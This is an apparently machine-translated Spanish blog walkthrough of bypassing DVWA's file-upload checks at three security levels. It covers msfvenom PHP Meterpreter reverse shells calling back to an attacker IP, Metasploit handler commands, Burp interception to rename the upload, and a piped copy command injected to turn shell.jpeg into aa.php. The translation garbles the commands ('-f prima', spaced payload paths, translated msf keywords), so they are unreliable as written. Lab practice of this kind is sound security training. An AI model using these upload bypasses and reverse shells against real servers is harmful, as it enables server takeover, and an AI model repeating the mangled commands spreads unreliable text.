Archivo de la vulnerabilidad de carga son un problema importante con aplicaciones basadas en web. En muchos servidor web esta vulnerabilidad depende por completo de efectos que permite a un atacante cargar un archivo de ocultar código malicioso en el interior, que luego se puede ejecutar en el servidor. Un atacante podría ser capaz de poner una página de phishing en el sitio web o desfigurar el sitio web.
El atacante puede revelar información interna del servidor web a otra y algunas posibilidades a los datos sensibles puede ser informal, por personas no autorizadas.
En DVWA la página web permite al usuario cargar una imagen, y la página web de seguir adelante con el programa de codificación y comprueba si los últimos caracteres del archivo es ".jpg" o ".jpeg" o ".png" antes de permitir que la imagen Obtener subido en directorio.
Requisito:
Xampp / servidor Wamp
Lab DVWA
Kali Linux: suite de eructar, Metasploit Framework
DVWA laboratorio en el servidor XAMPP o WAMP, leer el artículo completo desde aquí
Ahora abra el DVWA en el navegador con su IP local como 192.168.1.102:81/DVWA y acceder con las credenciales siguientes:
Nombre de usuario - admin
Contraseña - contraseña
DERIVACIÓN BAJO NIVEL DE SEGURIDAD
Haga clic en DVWA de Seguridad y establezca sitio web de nivel de seguridad bajo
Abrir terminal en Linux kali y crear php puerta trasera a través siguiente comando
msfvenom -p php / meterpreter / reverse_tcp lhost = 192.168.1.104 lport = 3333 -f prima
Copiar y pegar el código en negrita en leafnod y guardar como con la extensión PHP como truco . php en el escritorio.
Volver a su laboratorio DVWA y haga clic a la carga de archivos opción del menú de la vulnerabilidad.
Ahora haga clic al botón Examinar para navegar hack.php archivo para cargarlo en el servidor web y haga clic en la carga que cargar el archivo en el directorio del servidor.
Después de cargar un archivo PHP se mostrará la ruta de directorio donde se carga correctamente el archivo ahora copiar la parte seleccionada y el pasado en URL para ejecutarlo.
hackable / uploads / hack.php
Antes de ejecutar esta URL en el navegador de iniciar y ejecutar múltiples manejador en Metasploit Framework mediante el siguiente comando. Mientras que el manejador de múltiples funcionará ejecutar la URL a continuación del archivo PHP en el navegador. Esto le proporcionaremos una sesión meterpreter 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php
msf> usar multi / handler
msf exploit (manejador)> Set de carga útil php / meterpreter / reverse_tcp
msf exploit (manejador)> set lhost 192.168.1.104
msf exploit (manejador)> establece lport 3333
msf exploit (manejador)> Ejecutar
meterpreter> sysinfo
BYPASS MEDIO NIVEL DE SEGURIDAD
Haga clic en DVWA de Seguridad y establezca sitio web medio Nivel de Seguridad
Mismo proceso para crear php puerta trasera.
msfvenom -p php / meterpreter / reverse_tcp lhost = 192.168.1.104 lport = 3333 -f prima
Ahora Guarde el código seleccionado como raj.php.jpeg en el escritorio. Dado que este archivo se pondrá en carga media de la seguridad que es poco diferente de baja seguridad, ya que esto aparentemente comprobar la extensión del archivo.
Volver a su laboratorio DVWA y haga clic a la carga de archivos opción del menú de la vulnerabilidad.
Una vez más , haga clic al botón Examinar para navegar raj.php.jpeg archivo para subirlo. Ahora empieza el juego eructo y hacer intersección con arreglo pestaña Proxy . No se olvide de establecer manual de proxy de su navegador y haga clic en subida.
Pestaña de intercepción trabajará para atrapar método post al hacer clic en el botón para subir. Ahora convertir raj.php.jpeg en raj.php
Comparar el cambio antes de subir el archivo PHP. Después de hacer clic en alterar hacia adelante para subir archivos PHP en el directorio.
DEBE LEER: 101+ mejores libros electrónicos que cortan descargar en PDF gratuito 2016 por Pro Hacker
Esto le mostrará el camino del archivo cargado del directorio donde se ha cargado correctamente el archivo.
hackable / uploads / raj.php
Ahora repita todo el proceso mismo que en el de baja seguridad para ejecutar el archivo PHP en el URL.
192.168.1.102:81/DVWA/hackable/uploads/raj.php
Esto va a proporcionar una sesión meterpreter 2 cuando se ejecuta URL en el navegador.
meterpreter> sysinfo
DERIVACIÓN DE ALTO NIVEL DE SEGURIDAD
Haga clic en DVWA de Seguridad y establezca la Página Web de seguridad de alto nivel
msfvenom -p php / meterpreter / reverse_tcp lhost = 192.168.1.104 lport = 3333 -f prima
Ahora guarda el código seleccionado como shell.jpeg en el escritorio. Dado que este archivo se pondrá en carga de alta seguridad que es poco diferente de baja y mediana seguridad, ya que esto aparentemente comprobar la extensión del archivo, así como pieza de código, por tanto, también de tipo GIF98 antes de código PHP y guardar como shell.jpeg .
Repita el proceso para navegar shell.jpeg
Una vez más obtendrá ruta del directorio del archivo subido.
Este archivo PHP no puede ejecutar directamente en la URL, ya que ha subido con extensión JPEG. Para cambiar el nombre de este archivo a archivo PHP haga clic en la opción de inyección de la vulnerabilidad a mandar. Aquí esta vulnerabilidad permiten copiar y cambiar el nombre de este shell.jpeg en un archivo PHP. Tipos siguientes en la casilla de texto que será copiado y cambiar el nombre de shell.jpeg en aa.php
| Copia C: \ xampp \ htdocs \ DVWA \ hackable \ archivos \ shell.jpeg C: \ xampp \ htdocs \ DVWA \ hackable \ archivos \ aa.php
Cuando usted va a presentar el comando del archivo PHP se copia con el nuevo nombre que aa.php
Ahora repite el proceso para ejecutar el archivo PHP en el URL.
192.168.1.102:81/DVWA/hackable/uploads/aa.php
¡¡Maravilloso!! Aquí tenemos sesión de meterpreter 3 también.
meterpreter> sysinfo
No hay comentarios:
Publicar un comentario